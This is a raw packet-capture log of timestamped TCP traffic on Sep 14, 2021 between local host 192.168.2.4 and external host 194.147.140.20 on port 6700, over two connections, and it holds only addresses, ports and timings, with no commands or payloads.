Sep 14, 2021 16:48:31.398376942 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398464918 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398561954 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.398621082 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398699045 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398762941 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.398845911 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398871899 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398891926 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.398894072 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.398927927 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.398937941 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399107933 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399163008 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.399202108 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399353027 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399374008 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399424076 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.399507999 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399597883 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399601936 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.399698973 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399745941 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.399832010 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399878979 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.399938107 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.585216045 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.585278988 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.585381031 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.585453033 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.585570097 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.585623026 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.585674047 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.585675955 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.585750103 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.585829973 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.585910082 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.586143017 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.586200953 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.586241007 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.586250067 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.586293936 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.586342096 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.586358070 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.586436033 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.586833954 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.586893082 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.586945057 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.586975098 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.586991072 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.587032080 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.587109089 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.587112904 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.587177992 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.587250948 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.587331057 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.587488890 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.587543964 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.587591887 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.587637901 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.587680101 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.587688923 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.587739944 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.587796926 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.587893009 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.587981939 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.588103056 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588159084 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588207006 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588238955 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.588253021 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588301897 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.588363886 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.588515997 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588566065 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588593960 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.588625908 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588665009 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.588706970 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588721991 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.588781118 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.588835001 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.588934898 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.589097023 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.589277029 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.589389086 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.589425087 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.589453936 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.589515924 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.589623928 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.589725971 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.589818954 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.589905977 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.590234995 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590261936 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590281963 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590320110 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.590358019 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.590379000 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590507030 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.590677023 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590715885 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590761900 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.590810061 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.590847015 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590886116 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590953112 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.590955973 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.591017962 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.591078997 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.591157913 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.591161966 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.591195107 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.591272116 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.719233036 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:31.776591063 CEST	6700	49833	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:31.776725054 CEST	49833	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:36.821348906 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.012358904 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.012518883 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.013386965 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.218411922 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.219784021 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.411078930 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.414046049 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.673280954 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.678340912 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.678375959 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.678397894 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.678427935 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.678498983 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.678546906 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.801975012 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.869589090 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.869622946 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.869647026 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.869693995 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.869761944 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.869800091 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.869801044 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.869822025 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.869843006 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.869885921 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.869887114 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.869930029 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:37.869934082 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:37.870186090 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.048326969 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061028957 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061060905 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061160088 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061172962 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.061203003 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061259031 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.061275005 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061387062 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061476946 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061501980 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.061505079 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061547995 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.061569929 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061665058 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061738968 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.061825991 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061933994 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.061980963 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.062040091 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.062097073 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.062228918 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.062274933 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.062290907 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.062350035 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.252302885 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254514933 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254545927 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254684925 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254765987 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254822016 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254846096 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254877090 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254961014 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.254983902 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255007029 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255135059 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255181074 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255242109 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255299091 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255357027 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255430937 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255520105 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255561113 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255595922 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255682945 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255726099 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255840063 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255875111 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255918026 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255954981 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.255997896 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.256078959 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.256100893 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.256161928 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.256200075 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.256237984 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.268584967 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.459954023 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.459995985 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460196972 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.460309029 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460334063 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460357904 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460431099 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.460696936 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460725069 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460750103 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460772038 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460794926 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460828066 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.460877895 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.460952997 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461010933 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.461198092 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461270094 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461308002 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461322069 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.461344957 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461414099 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.461431980 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461512089 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461549997 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461564064 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.461628914 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461678028 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.461705923 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461888075 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461909056 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461935043 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.461963892 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.462003946 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.462095022 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463366032 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463432074 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463483095 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.463551044 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463574886 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463598013 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463614941 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.463665962 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.463684082 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463707924 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463746071 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463797092 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.463814020 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463836908 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463860989 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.463872910 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.463943005 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.651561975 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.651618004 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.651637077 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.651676893 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.651813984 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.652422905 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.652448893 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.652545929 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.652556896 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.652663946 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.652718067 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.652787924 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.652832031 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.652894974 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.652945042 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.652975082 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.653260946 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.653629065 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.653671026 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.653721094 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.653739929 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.653816938 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.653858900 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.653882980 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.653963089 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.654010057 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.654058933 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.654231071 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.654278994 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.658803940 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658842087 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658863068 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658884048 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658905029 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658927917 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658943892 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.658955097 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658977032 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658993959 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.658998013 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.658998013 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659019947 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659038067 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659041882 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659063101 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659081936 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659085989 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659107924 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659111977 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659156084 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659177065 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659178972 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659199953 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659224033 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659224033 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659246922 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659267902 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659270048 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659295082 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659317970 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659322023 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659337997 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659358978 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659378052 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659378052 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659398079 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659419060 CEST	49834	6700	192.168.2.4	194.147.140.20
Sep 14, 2021 16:48:38.659420013 CEST	6700	49834	194.147.140.20	192.168.2.4
Sep 14, 2021 16:48:38.659439087 CEST	6700	49834	194.147.140.20	192.168.2.4
